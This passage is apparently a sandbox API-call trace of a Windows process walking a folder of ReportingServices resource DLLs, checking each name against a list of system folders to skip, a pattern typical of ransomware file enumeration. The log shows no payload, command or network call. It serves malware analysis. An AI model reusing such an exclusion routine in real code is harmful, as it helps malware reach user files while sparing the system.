ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5478, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.737] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d770, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d698, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0126.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.738] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1de43d5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1de43d5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.738] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dcb0 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.739] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c63313, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c63313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c895d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a090, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.739] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d920, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dba8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.740] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffddb96c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffddb96c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffddb96c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0126.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0126.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0126.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d800, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0126.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0126.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.740] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4cd4a32, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4cd4a32, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4cd4a32, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14ac8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.740] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0126.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d800, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0126.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.741] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc70564d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc70564d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc70564d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaac8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.741] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0126.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0126.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.742] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63ed72c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63ed72c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6a7bf80, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.742] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, 